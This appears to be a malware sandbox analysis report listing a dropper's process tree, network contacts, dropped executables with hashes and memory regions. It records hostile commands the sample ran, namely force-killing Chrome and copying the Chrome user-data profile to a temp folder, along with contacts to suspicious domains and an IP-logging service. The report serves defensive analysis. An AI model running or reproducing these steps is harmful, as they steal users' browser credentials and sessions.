C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\1710990cbc64.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\1710990cbc64.exe" -a

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1016 -ip 1016

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1732527216 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1016 -s 356

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\SysWOW64\xcopy.exe

xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 1136

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 watira.xyz udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 db-ip.com udp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 172.67.75.166:443 db-ip.com tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 api.db-ip.com udp
US 172.67.75.166:443 api.db-ip.com tcp
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 www.maxmind.com udp
US 104.17.27.25:80 www.maxmind.com tcp
GB 37.0.8.235:80 tcp
US 8.8.8.8:53 166.75.67.172.in-addr.arpa udp
US 8.8.8.8:53 161.74.67.172.in-addr.arpa udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 music-sec.xyz udp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
US 8.8.8.8:53 25.27.17.104.in-addr.arpa udp
US 8.8.8.8:53 233.130.159.162.in-addr.arpa udp
GB 142.250.200.3:80 c.pki.goog tcp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 prophefliloc.tumblr.com udp
US 74.114.154.18:443 prophefliloc.tumblr.com tcp
N/A 127.0.0.1:62806 tcp
N/A 127.0.0.1:62808 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 18.154.114.74.in-addr.arpa udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
MD 176.123.2.239:80 176.123.2.239 tcp
US 8.8.8.8:53 239.2.123.176.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp

Files

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe

MD5 aaaf685d045b423d4d96ecaca344b4d5
SHA1 f2264a40421e66029db1cdf7fe8bb8ada2614862
SHA256 f77fee8eef443261bc896ac6f10c099277a5fd31baa88f4fa171905157c5d6d8
SHA512 8e01c8cf6623250050c099f2cb139aeac6b6318841d23d7701e6ceffc0dcdba79220533af1e84a34750ac7efc2d56750aeb9a5468ca12a12dab9ce2f1899ec4e

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/2532-29-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2532-33-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2532-32-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2532-62-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2532-61-0x0000000064941000-0x000000006494F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\c862a054a35.exe

MD5 0f3487e49d6f3a5c1846cd9eebc7e3fc
SHA1 17ba797b3d36960790e7b983c432f81ffb9df709
SHA256 fa64075d63724c29bd96e172b3a59c4db6bc80462f8d4408b0676436958a4f1a
SHA512 fe5959d83d8d106675c8ca5ceb424648148ee812ce79f667b25439ef82bf2373fd08342b8d06e40c04e718209ef32a057804c80da0e3a7aac2d88f5ab29df37f

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\1710990cbc64.exe

MD5 c0d18a829910babf695b4fdaea21a047
SHA1 236a19746fe1a1063ebe077c8a0553566f92ef0f
SHA256 78958d664b1c140f2b45e56c4706108eeb5f14756977e2efd3409f8a788d3c98
SHA512 cca06a032d8232c0046c6160f47b8792370745b47885c2fa75308abc3df76dcc5965858b004c1aad05b8cd8fbb9a359077be1b97ec087a05d740145030675823

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\08240101651be7e1.exe

MD5 7e06ee9bf79e2861433d6d2b8ff4694d
SHA1 28de30147de38f968958e91770e69ceb33e35eb5
SHA256 e254914f5f7feb6bf10041e2c705d469bc2b292d709dc944381db5911beb1d9f
SHA512 225cd5e37dbc29aad1d242582748457112b0adb626541a6876c2c6a0e6a27d986791654fd94458e557c628dc16db17f22db037853fae7c41dde34ba4e7245081

memory/4480-92-0x00000000006E0000-0x00000000007CE000-memory.dmp

memory/4564-93-0x0000000000830000-0x000000000085C000-memory.dmp

memory/4564-96-0x00000000027C0000-0x00000000027E0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

MD5 ef5fa848e94c287b76178579cf9b4ad0
SHA1 560215a7c4c3f1095f0a9fb24e2df52d50de0237
SHA256 949eec48613bd1ce5dd05631602e1e1571fa9d6b0034ab1bffe313e923aff29c
SHA512 7d4184aa762f3db66cf36955f20374bf55f4c5dbe60130deaeade392296a4124867c141f1d5e7fbf60b640ef09cce8fb04b76b7dd20cbac2ce4033f9882a1071

memory/4564-108-0x00000000027F0000-0x00000000027F6000-memory.dmp

memory/4188-109-0x0000000000F10000-0x0000000001052000-memory.dmp

memory/1308-105-0x0000000000990000-0x0000000000998000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\4f5baa1083db067.exe

MD5 7aaf005f77eea53dc227734db8d7090b
SHA1 b6be1dde4cf73bbf0d47c9e07734e96b3442ed59
SHA256 a5f373f8bcfae3d9f4895c477206de63f66f08e66b413114cf2666bed798eb71
SHA512 19dc8764c5347a73767caed67a8a3f2fe0ecb07cacf2f7b2a27a48592780dede684cfb52932695a79725a047f2c092b29a52b5fd0c7dc024a0166e6ada25633d

memory/4564-94-0x0000000001000000-0x0000000001006000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\e4b2f18fb52218.exe

MD5 e2213d70937e476e7a778f1712912131
SHA1 f8f09b6965c83c361210a1b11c8039b7ca9a30b9
SHA256 7312ff88c5eb0eb108cc0f04b91f871f59faed40d28cc5364ff456b0b063c37b
SHA512 cd97ff1cf43462b05461c3c5b3c2efe6aea8645968eae89c1936cf0f2657a05bbdcced863e1b68049c4b4624387f2b1d265257d5ce154053ecd31a032a74611f

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe

MD5 77c7866632ae874b545152466fce77ad
SHA1 f48e76c8478a139ea77c03238a0499cfa1fc8cea
SHA256 e3c9119e809a1240caaaf4b6d5420352f037cc2585cb321cb746f05ed0ec0e43
SHA512 e1b1fad94981b2aa9d0aeb5b7f6d93a2f7f4c8305b05ea89ad66c35c6556ff2333e861c70fcad6953991d6dcbeea3031fed1d5791d99806423056c1c8dcd9ad8

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\f34b9ab9db6d16.exe

MD5 0965da18bfbf19bafb1c414882e19081
SHA1 e4556bac206f74d3a3d3f637e594507c30707240
SHA256 1cdddf182f161ab789edfcc68a0706d0b8412a9ba67a3f918fe60fab270eabff
SHA512 fe4702a2fde36b4fb0015ad7d3e2169a1ccbf5e29d7edef40f104ed47661b4b0365b13b1913e9f4e0ab7bc9ac542ee86c02a802a13567dfd0b8f5485a5be829b

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\53516815d3135fe3.exe

MD5 5c2e28dedae0e088fc1f9b50d7d28c12
SHA1 f521d9d8ae7381e3953ae5cf33b4b1b37f67a193
SHA256 2261a3d740572f9d0ee42faad5b0d405df16506e104bd912e7c7b24d7fddcc5f
SHA512 f6f100508acb77af5b3442673c9d01a6a16cc39521b618eebccd482bf9f50b3991109f82b97e48e8c3cc0221f0be9e164867ba79ac2f2bc4e25cbdb5f7daa15f

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\453c5fa76a849.exe

MD5 46e9d76672b9d24ba14ea963574cc6a2
SHA1 caf88d470dc1241aca2b159b26953194a8d59cca
SHA256 2f21e720e8fd2c591fdd52d7267370a2f0894bb4d3ca564392271cc025102ba7
SHA512 3e940ccdc588f0a284ce9c94106161845fb878c42db983b13fffbcac8c5620626ca58d745527309213716889546c4de4777c24f8c706dfe74ece7aa1772022c6

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\08240101651be7e010.exe

MD5 13a289feeb15827860a55bbc5e5d498f
SHA1 e1f0a544fcc5b3bc0ab6a788343185ad1ad077ad
SHA256 c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775
SHA512 00c225fb1d88920c5df7bb853d32213a91254fb8c57169c58c8b0ffab4501486e24d87e3d8f5665b16e366362cb81deec535d833ed42434fdc31f0400ee7ffa7

memory/2532-39-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2532-38-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2532-37-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2532-36-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2532-35-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2532-34-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2532-31-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2532-50-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2532-27-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/4188-111-0x0000000005910000-0x00000000059A2000-memory.dmp

memory/4188-110-0x0000000005DE0000-0x0000000006384000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

MD5 ad0aca1934f02768fd5fedaf4d9762a3
SHA1 0e5b8372015d81200c4eff22823e854d0030f305
SHA256 dc10f50f9761f6fbafe665e75a331b2048a285b1857ad95e0611ace825cba388
SHA512 2fba342010ba85440784190245f74ea9e7c70974df12c241ccb6b72a6e1006a72bd1fa2e657f434d7479758f9508edb315398f6e95d167a78b788cea732be3b7

memory/4188-119-0x0000000005AA0000-0x0000000005AAA000-memory.dmp

memory/4188-120-0x0000000005C70000-0x0000000005D0C000-memory.dmp

memory/3744-124-0x00000000004D0000-0x00000000004E0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 01ad10e59fa396af2d5443c5a14c1b21
SHA1 f209a4f0bb2a96e3ee6a55689e7f00e79c04f722
SHA256 bef1cffaba8186ce62265e0b322ca9fd9326a8929591df569a4953456c752137
SHA512 1e067ade999ff933a644fde66c6ab9abb8a960ce1c8064368adcde4c09d924bd22d1b43c68b7c968e982fc75937969a2876e9e2a024f72e693f9ba397d449e02

memory/1136-135-0x00000000022E0000-0x00000000023C4000-memory.dmp

memory/2532-157-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2532-162-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2532-161-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2532-153-0x0000000000400000-0x0000000000BD8000-memory.dmp

memory/2532-159-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2168-147-0x0000000000400000-0x00000000004E4000-memory.dmp

memory/2532-160-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4188-170-0x0000000003060000-0x0000000003072000-memory.dmp

memory/1016-171-0x0000000000400000-0x0000000002C6D000-memory.dmp

C:\ProgramData\softokn3.dll

MD5 a378c450e6ad9f1e0356ed46da190990
SHA1 d457a2c162391d2ea30ec2dc62c8fb3b973f6a66
SHA256 b745b0c0db87a89de5e542e9ae0a06f585793ac3f4240bff3524e7dbdba79978
SHA512 e6cdc8f570af97e48b1d8968730db0afc46f9dd6ad7366a936a5518801debb61c86cc61526e5e26e7ad3b3daeb76a19b32d7c0da33140597f6d19163683c12b5

memory/2168-200-0x0000000000E50000-0x0000000000F2D000-memory.dmp

memory/4628-202-0x00000000001E0000-0x000000000023A000-memory.dmp

memory/3744-204-0x00007FFE74930000-0x00007FFE749CE000-memory.dmp

memory/3744-205-0x0000000000E80000-0x0000000000E8E000-memory.dmp

memory/4188-209-0x0000000005D10000-0x0000000005D9C000-memory.dmp